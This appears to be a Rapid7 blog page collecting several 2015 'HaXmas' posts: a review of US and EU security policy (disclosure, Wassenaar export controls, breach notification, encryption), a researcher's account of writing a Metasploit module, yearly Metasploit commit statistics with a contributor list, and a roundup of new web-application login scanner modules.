Despite my comments above, it certainly isn’t all plain sailing, and there are those in the Government that fear that researchers may do more harm than good. We saw this particularly clearly with a vehicle safety bill proposal in the second half of the year, which would make car research illegal. Unfortunately, the momentum for this was fed by fears over the way certain high profile car research was handled this year.

 

The good news is that there were plenty of voices on the other side pointing out the value of research as the bill was debated in two Congressional hearings. As yet, this bill has not been formally introduced, and it’s unlikely to be without a serious rewrite. Still, it behooves the security research community to consider how its actions may be viewed by those on the outside – are we really showing our good intentions in the best light? I have increasingly heard questions arise in the government about regulating research or licensing researchers. If we want to be able to address that kind of thinking in a constructive way to reach the best outcome, we have to demonstrate an ability to engage productively and responsibly.

 

Vulnerability Disclosure

 

Following high profile vulnerability disclosures in 2014 (namely, Heartbleed and Shellshock), and much talk around bug bounties, challenges with multi-party coordinated disclosures, and best practices for so called “safety industries” – where problems with technology can adversely impact human health and safety, so e.g. medical devices, transportation, power grids etc. – the topic of vulnerability disclosure was once again on the agenda. This time, it was the Obama Administration taking an interest, led by the National Telecommunications and Information Administration (NTIA, part of the Department of Commerce). They convened a public multi-stakeholder process to tackle the thorny and already much-debated topic of vulnerability disclosure.  The project is still in relatively early stages, and could probably do with a few more researcher voices, so get involved! One of the inspiring things for me is the number of vendors that are new to thinking about these things and are participating.  Hopefully we will see them adopting best practices and leading the way for others in their industries.

 

At this stage, participants have split into four groups to tackle multiple challenges: awareness and adoption of best practices; multi-party coordinated disclosure; best practices for safety industries; and economic incentives.  I co-lead the awareness and adoption group with the amazing Amanda Craig from Microsoft, and we’re hopeful that the group will come up with some practical measures to tackle this challenge.  If you’re interested in more information on this issue specifically, you can email us.

 

Export Controls

 

Thanks to the Wassenaar Arrangement, in 2015, export controls became a hot topic in the security industry, probably for the first time since the Encryption Wars (Part I).

 

The Wassenaar Arrangement is an export control agreement amongst 41 nation states with a particular focus on national security issues – hence it pertains to military and dual use technologies. In 2013, the members decided that should include both intrusion and surveillance technologies (as two separate categories).  From what I’ve seen, the surveillance category seems largely uncontested; however, the intrusion category has caused a great deal of concern across the security and other business communities.

 

This is a multi-layered concern – the core language that all 41 states agreed to raises concerns, and the US proposed rule for implementing the control raises additional concerns. The good news is that the Bureau of Industry and Security (BIS) – the folks at the Department of Commerce that implement the control – and various other parts of the Administration, have been highly engaged with the security and business communities on the challenges, and have committed to redrafting the proposed rule, implementing a number of exemptions to make it livable in the US, and opening a second public comment period in the new year.  All of which is actually kind of unheard of, and is a strong indication of their desire to get this right.  Thank you to them!

 

Unfortunately the bad news is that this doesn’t tackle the underlying issues in the core language. The problem here is that the definition of what’s covered is overly broad and limits sharing information on exploitation. This has serious implication for security researchers, who often build on each other’s work, collaborate to reach better outcomes, and help each other learn and grow (which is also critical given the skills shortage we face in the security industry). If researchers around the world are not able to share cybersecurity information freely, we all become poorer and more vulnerable to attack.

 

There is additional bad news: more than 30 of the member states have already implemented the rule and seem to have fewer concerns over it, and this means the State Department, which represents the US at the Wassenaar discussions, are not enthusiastic about revisiting the topic and requesting the language be edited or overturned. The Wassenaar Arrangement is based on all members arriving at consensus, so all must vote and agree when a new category is added, meaning the US agreed to the language and agreed to implement the rule. From State’s point of view, we missed our window to raise objections of this nature and it’s now our responsibility to find a way to live with the rule. Dissenters ask why the security industry wasn’t consulted BEFORE the category was added.

 

The bottom line is that while the US Government can come up with enough exemptions in their implementation to make the rule toothless and not worth the paper it’s written on, it will still leave US companies exposed to greater risk if the core language is not addressed.

 

As I mentioned, we’ve seen excellent engagement from the Administration on this issue and I’m hopeful we’ll find a solution through collaboration. Recently, we’ve also seen Congress start to pay close attention to this issue, which is also likely to help move the discussion forward:

  • In December, 125 members of the House of Representatives signed a letter addressed to the White House asking them to step into the discussion around the intrusion category. That’s a lot of signatories and will hopefully encourage the White House to get involved in an official capacity. It also indicates that Wassenaar is potentially going to be a hot topic for Congress in 2016.
  • Reflecting that, the House Committee on Homeland Security, and the House Committee on Oversight and Government Reform are joining forces for a joint hearing on this topic in January.

 

The challenges with the intrusion technology category of the Wassenaar Arrangement highlight a hugely complex problem: how do we reap the benefits of a global economy, while clinging to regionalized nation state approaches to governing that economy?  How do you apply nation state laws to a borderless domain like the internet? There are no easy answers to these questions, and we’ll see the challenges continue to arise in many areas of legislation and policy this year.

 

Breach Notification

 

In the US, there was talk of a federal law to set one standard for breach notification.  The US currently has 47 distinct state laws setting requirements for breach notification.  For any businesses operating in multiple states, this creates confusion and administrative overhead.  The goal for those that want a federal breach notification law is to simplify this by having one standard that applies across the entire country. In principle this sounds very sensible and reasonable.  The problem is that the federal legislative process does not move quickly, and there is concern that by making this a federal law, it will not be able to keep up with changes in the security or information landscape, and thus consumers will end up worse off than they are today. To address this concern, consumer protection advocates urge that the federal law not pre-empt state law that sets a higher standard for notification. However, this does not alleviate the core problem any breach notification bill is trying to get at – it just adds yet another layer of confusion for businesses. So I suspect it’s unlikely we’ll see a federal breach notification bill pass any time soon, but I wouldn’t be surprised if we see this topic come up again in cybersecurity legislative proposals this year.

 

Across the pond, there was an interesting development on this topic at the end of the year – the European Union issued the Network and Information Security Directive, which, amongst other things, requires that operators of critical national infrastructure must report breaches (interestingly, this is kind of at odds with the US approach, where there is a law protecting critical infrastructure from public disclosure). The EU directive is not a law – member states will now have to develop their own in-country laws to put this into practice. This will take some time, so we won’t see a change straight away.  My hope is that many of the member states will not limit their breach notification requirements to only organizations operating critical infrastructure – consumers should be informed if they are put at risk, regardless of the industry. Over time, this could mark a significant shift in the dialogue and awareness of security issues in Europe; today there seems to be a feeling that European companies are not being targeted as much as US ones, which seems hard to believe. It seems likely to me that a part of the reason we don’t hear about it so much because the breach notification requirement is not there, and many victims of attacks keep it confidential.

 

Cyber Hygiene

 

This was a term I heard a great deal in government circles this year as policy makers tried to come up with ways of encouraging organizations to put basic security best practices in place. The kinds of things that would be on the list here would be patching, using encryption, that kind of thing.  It’s almost impossible to legislate for this in any meaningful way, partly because the requirements would likely already be out of date by the time a bill passed, and partly because you can’t take a one-size-fits-all approach to security. It’s more productive for Governments to take a collaborative, educational approach and provide a baseline framework that can be adapted to an organization’s needs. This is the approach the US takes with the NIST Framework (which is due for an update in 2016), and similarly CESG in the UK provides excellent non-mandated guidance.

 

There was some discussion around incentivizing adoption of security practices – we see this applied with liability limitation in the information sharing law.  Similarly, there was an attempt at using this carrot to incentivize adoption of security technologies.  The Department of Homeland Security (DHS) awarded FireEye certification under the SAFETY Act. This law is designed to encourage the use of anti-terrorism technologies by limiting liability for a terrorist attack. So let’s say you run a football stadium and you deploy body scanners for everyone coming on to the grounds, but someone still manages to smuggle in and set off an incendiary device; you could be protected from liability because you were using the scanners and taking reasonable measures to stop an attack. In order for organizations to receive the liability limitation, the technology they deploy must be certified by DHS.

 

Now when you’re talking about terrorist attacks, you’re talking about some very extreme circumstances, with very extreme outcomes, and something that statistically is rare (tragically not as rare as it should be). By contrast, cybercrime is extremely common, and can range vastly in its impact, so this is basically like comparing apples to flamethrowers. On top of that, using a specific cybersecurity technology may be less effective than an approach that layers a number of security practices together, e.g. setting appropriate internal policies, educating employees, patching, air gapping etc. Yet, if an organization has liability limitation because it is deploying a security technology, it may feel these other measures are unnecessarily costly and resource hungry. So there is a pretty reasonable concern that applying the SAFETY Act to cybersecurity may be counter-productive and actually encourage organizations to take security less seriously than they might without liability limitation.

 

None-the-less, there was a suggestion that the SAFETY Act be amended to cover cybersecurity. Following a Congressional hearing on this, the topic has not raised its head again, but it may reappear in 2016.

 

Encryption

 

Unless you’ve been living under a rock for the past several months (which might not be a terrible choice all things considered), you’ll already be aware of the intense debate raging around mandating backdoors for encryption. I won’t rehash it here, but have included it because it’s likely to be The Big Topic for 2016. I doubt we’ll see any real resolution, but expect to see much debate on this, both in the US and internationally.

 

~@infosecjen

New-year-greetings-2016-4.jpg

This post is the eighth in the series, "12 Days of HaXmas."

 

It’s that time of year again; when we all look to making resolutions to make changes in our lives. For some, it is eating healthy or exercising. Others decide to spend their time differently or change spending habits. Often these resolutions work for a few weeks, but then we quickly fall back into the old habits and break those resolutions. Me, I am resolving to write more Metasploit modules. You see, back in October, Rapid7 publicly (and responsibly) disclosed a bug I found in the HP SiteScope software. As part of that release, I wrote my first Metasploit module. While I would not call myself a programmer, or even proficient in Ruby, it was such a rewarding experience that I want to do it again.

to-do-resolution-new-year.jpg

The process started in June when I discovered the flaw. (You can read more about the disclosure here) I went ahead and started through the disclosure process (see here for Rapid7’s disclosure policy) and as part of the procedure, I decided to create a Metasploit module for the exploit. By nature, or by previous experience, I am a scripter. I love to write little one-off scripts that make my day to day life easier. When I was a Systems Administrator, my scripts would be written in PowerShell, Batch jobs, or Bash scripts. Once I started getting into security, I started using a more “grown up” language and learned Python. While I had a little experience with Ruby (Serpico), I had never attempted at learning or creating any tools using Ruby, so the thought of writing not only a Ruby script, but a Metasploit script, was a bit daunting. Luckily there are some great resources on Rapid7’s sites as well as awesome members of the Metasploit team that were willing to help me out. One site is the How to get started writing an exploit article on Github. Another is a Community series about writing exploits.

 

Before bothering with trying to write in Ruby, I created the exploit in a language I am familiar with. This would allow me to get the exploit written up quickly, as well as easily port to Ruby/Metasploit when finished. (I also figured if I wanted someone to help me, they would want to have a working script, or that it would at least be helpful) This process was invaluable to me. I was able to work through the process and get into the nitty-gritty of exploit development. It took a little while, but soon I had a working Python exploit. The next step was getting a working Metasploit module.

 

If you have never created a Metasploit module, or have not looked at the code of different modules, I would suggest you look at a few existing modules before attempting to write your own. That's what I did. I looked for similar exploits to the one I was creating, and looked at how they were written and what they did. I was able to copy out much of the existing modules, and modify the code to my own exploit. At first the module was clunky and ugly. I enlisted the help of one of the Metasploit team’s members, Juan Vazquez, who took a look at the exploit code, the module, and tested a bit against the system I stood up for him. Quicker than I can explain he got back to me information I needed to help develop the module better, and he even modified the code and added in some other features.

 

The day finally came, my exploit module was completed, the advisory went out, and the module was merged into Metasploit. What a relief it was for me to have that done and working.

 

Since then I have started looking into more modules and exploits. This year, my resolution is to continue to add to Metasploit and the information security community by creating modules for Metasploit. While getting started may seem like a daunting task, once you do you will find how rewarding an experience it is. I urge you to make a similar resolution.

to-do-resolution-new-year2.jpg

This is the seventh post in the series, "The 12 Days of HaXmas."

 

It's the last day of the year, which means that it's time to take a moment to reflect on the ongoing development of the Metasploit Framework, that de facto standard in penetration testing, and my favorite open source project around.

 

While the acquisition of Metasploit way back in 2009 was met with some healthy skepticism, I think this year, it's easy to say that Rapid7's involvement with Metasploit has been an enormously positive experience for the project, regardless if you happen to work on or use Rapid7 products. 2015 marks another year of our (and your!) commitment to both the principles of open source and the day-to-day care and feeding of this beast.

 

New Modules!

msf-banner-2015.pngChecking out today's development branch banner and comparing to last year, it looks like Metasploit Framework saw the addition of 136 new exploits, 98 new auxiliary modules, 34 new post modules, and 81 new payloads, for a grand total of 349 new modules for the calendar year -- just a shade under one a day. Compared to last year, the new payload count is particularly impressive; that count represents the work being done around refreshing and updating Meterpreter and expanding what it means to get shells.

 

Commits and Authors

2015 saw 7099 commits, 5519 of which were non-merge commits. Once again, this is an incredible effort from a contributor pool of 176 distinct committers, the vast majority of whom weren't employed by Rapid7. Most open source projects are really only worked on by a handful of people, the thing that makes Metasploit one of the top ten Ruby projects hosted on GitHub (not to mention the second-most starred security project), is the support, effort, and criticism of our developer community. And speaking of our developer community, the top 25 most prolific committers (by non-merge count) for 2015 are:

 

Name/AliasCommit Count
jvazquez-r71112
wchen-r7757
jhart-r7336
hdm256
wvu-r7252
bcook-r7235
oj231
Meatballs1199
todb-r7145
jlee-r7126
espreto120
FireFart96
dmaloney-r787
benpturner84
JT80
stufus68
zeroSteiner

66

KronicDeth64
void-in59
joevennix58
Matthew Hall54
brandonprry45
rastating43
techpeace36
Pedro Ribeiro35

 

We have some new names on that list, which is great! I'm super excited to see what these newly prolific security dev's will be up to in 2016. And, as was the case last year, just about half (12 of 25) of these committers weren't financially connected to Metasploit products as employees or contractors; they're among the hard-working volunteers that are responsible for pushing security research forward.

 

Finally, here's the alphabetized list of everyone who committed at least one chunk of content to the Metasploit Framework in 2015:

 

0xFFFFFF, aakerblom, aczire, Adam Ziaja, agix, Alex Watt, Alexander Salmin, Anant Shrivastava, Andrew Smith, andygoblins, aos, aushack, Balazs Bucsay, Bazin Danil, BAZIN-HSC, bcoles, bcook-r7, Ben Lincoln, Ben Turner, benpturner, bigendian smalls, Bigendian Smalls, Borja Merino, Boumediene Kaddour, brandonprry, brent morris, bturner-r7, C-P, cdoughty-r7, Christian Sanders, claudijd, cldrn, crcatala, Daniel Jensen, Darius Freamon, Dave Hardy, David Barksdale, David Lanner, Denis Kolegov, dheiland-r7, Dillon Korman, dmaloney-r7, dmohanty-r7, dmooray, dnkolegov, Donny Maasland, Donny Maasland (Fox-IT), Elia Schito, EricGershman, erwanlr, espreto, Ewerson Guimaraes (Crash), eyalgr, Fabien, farias-r7, Fatih Ozavci, Felix Wehnert, Ferenc Spala, FireFart, fraf0, g0tmi1k, Gabor Seljan, gmikeska-r7, Guillaume Delacour, h00die, Hans-Martin Münch (h0ng10), hdm, headlesszeke, IMcPwn, jabra, Jack64, jaguasch, Jake Yamaki, Jakob Lell, jakxx, Jay Smith, jduck, jhart-r7, jlee-r7, joevennix, John Lightsey, John Sherwood, Jon Cave, jstnkndy, JT, juanvazquez, Julian Vilas, julianvilas, jvicente, jvoisin, jww519, kaospunk, karllll, kernelsmith, kn0, KronicDeth, lanjelot, Lluis Mora, lsanchez-r7, lsato-r7, Lutzy, m-1-k-3, m0t, m7x, Manuel Mancera, Marc-Andre Meloche, Mark Judice, Matthew Hall, Matthias Ganz, Meatballs1, Mike, Mo Sadek, mubix, Muhamad Fadzil Ramli, Nanomebia, Nate Power, Nicholas Starke, Nikita Oleksov, nixawk, nstarke, nullbind, oj, pdeardorff-r7, Pedro Ribeiro, peregrino, Peregrino Gris, PsychoMario, pyllyukko, radekk, RageLtMan, Ramon de C Valle, rastating, rcnunez, Ricardo Almeida, root, Rory McNamara, rwhitcroft, Sam H, Sam Handelman, Sam Roth, sammbertram, samvartaka, scriptjunkie, Sean Verity, sekritskwurl, sgabe, sgonzalez-r7, shuckins-r7, Sigurd Jervelund Hansen, somename11111, stufus, Sven Vetsch, Tab Assassin, techpeace, Th3R3p0, Thomas Ring, timwr, todb-r7, Tom Spencer, TomSellers, trevrosen, void-in, vulp1n3, wchen-r7, wez3, wvu-r7, xistence, Zach Grace, zeroSteiner

 

We really couldn't have made Metasploit without everyone listed there, so thanks again for sharing our commitment to open source security research and development. May your buffers always be overflowing.

 

Ponies!

Of course, the most beloved change to Metasploit in 2015 wasn't the Great Regemification, the souped up Android payloads (or any of the other amazing work on the Metasploit and Meterpreter payload systems in general), the integrated Omnibus installers, or any of those boring technical advancements that push the boundaries of penetration testing. It was the April Fool's Pony Banner Update, made possible by the ponysay project run by Erkin Batu AltunbaĊŸ. So, here you go:

 

msf-banner-pony-exploits-are-magic.pngmsf-banner-pony-free-shells-forever.pngmsf-banner-pony-shells-are-cool.pngmsf-banner-pony-20-percent-cooler.pngmsf-banner-pony-i-love-shells.png

 

Happy New Year, everyone!

This is the sixth post in the series, "The Twelve Days of HaXmas."

 

laughing-squid-xmas-wreath.jpgWell, the year is coming to a close, and it's just about time for the annual breakdown of Metasploit commit action. But before we get to that, I wanted to take a moment to highlight the excellent work we landed in 2015 in adding new web application login support to Metasploit. After all, who needs exploits when your password is "public" or "admin" or "password" or any other of the very few well-known default passwords? Maybe it's not the sexiest way to get a foothold on a network, but we are increasingly living in a network environment that hosts loads and loads of unconfigured, insecure Internet of Things devices.

 

So, let's take a stroll through the new web application login support added over the first half of 2015. Maybe you missed them the first time around, so this sixth day of HaXmas is a fine time to catch up.

 

Chef and Zabbix

https://github.com/rapid7/metasploit-framework/pull/4787

 

In February of 2015, HD Moore picked up a request for a couple of brute force modules designed to guess the passwords to the web front ends for Chef, the popular DevOps deployment tool, and Zabbix, an enterprise monitoring system. Most web application authentication systems are uniquely implemented; rarely do web applications use HTTP basic authentication any more.

 

Sussing out the basic API for entering a username and password can take a little time and effort. While there are automatic methods for determining the right format (namely, Rapid7's AppSpider), if you have the wherewithal to do a little investigative work, reading the pull request for the Chef and Zabbix modules is a pretty great example of how to toss off a quick web application brute force module, with the initial work from HD and the landing work from David TheLightCosine Maloney being pretty illuminating.

 

GitLab

https://github.com/rapid7/metasploit-framework/pull/4942

 

In March of 2015, contributor Ben Meatballs Campbell of MWR Labs published an advisory about a user enumeration information leak in GitLab. GitLab is a popular open source alternative to GitHub Enterprise, used to host GitHub-like repositories internally for software development.

 

While he was in that neighborhood, he put together a quick login scanner for GitLab as well, presumably to start guessing passwords for the users just identified via this leak. Again, we can see from the pull request that this kind of web application protocol implementation has gotten pretty straightforward.

 

Nessus REST

https://github.com/rapid7/metasploit-framework/pull/5112

 

In April of 2015, contributor Waqas voidin Ali offered up a login scanner for Nessus, the popular vulnerability scanner. It is suffice to say, if an attacker gets a hold of your vulnerability scanner's authentication credentials, you have some pretty serious problems.

 

Vuln scanners are one of those network services that makes for an ideal attack platform - they tend to touch a lot of machines through unsolicited connections, which will mask any lateral movement attempts an attacker is likely to make, they have loads of information about the internal network, making an otherwise noisy scanning operation a moot point, and they tend to already be ignored by any sort of internal security control, given how noisy they are normally on the wire.

 

Routinely checking your vulnerability scanner for weak, guessable, and known passwords is pretty basic internal security hygiene, since the consequences of compromise are so dire. This module makes this task pretty easy.

 

Symantec Gateway

https://github.com/rapid7/metasploit-framework/pull/4945

 

In March, Wei sinn3r_ Chen put together a login scanner for Symantec Web Gateway, a web proxy used to filter for malware and other sorts of evil from malicious or compromised web sites. While this was an exercise similar to the above web application login modules, the most significant effort in this area happened in May of 2015.

 

Using his recent Symantec Gateway module as an example, Wei put together the One True Way for writing web application login scanners. This is a pretty critical chunk of documentation, since it's a pretty great HOWTO on quickly and reliably figuring out the login sequence for pretty much any normal web application.

 

Looking ahead to 2016

Why am I devoting a whole HaXmas post to this corner of 2015 development work? Well, I don't know if you've noticed, but we've been deluged with a massive pile of Internet of Things gear that (a) offer little in the way of built-in security, and (b) offer a lot in the way of default passwords, and (c) are nearly always managed via some custom web application front end. Oh, and (d): I don't -- can't -- imagine a future where we will have fewer of these things.

 

Today, we have some solid documentation on writing web application login scanners, and a fistful of example implementations. Now, take the fact that most of these devices never get their default passwords changed, we have pretty great chances of guessing correctly if we're on the same network and make a few guesses. As an added bonus, there's now a whole bunch more of these IoT devices which just got unboxed, powered on, and network connected on Christmas morning.

 

We really do need to get ahead of this problem, and about the best way I can think of to tackle it is to actively explore this space in an open source environment like the Metasploit Framework. So, while you're enjoying this holiday season, maybe take an hour or two to audit your own local home network, see how many web applications you can find, and consider kicking out a corresponding Metasploit module in order to highlight the risk of factory default passwords on these devices.

Filter Blog

By date: By tag: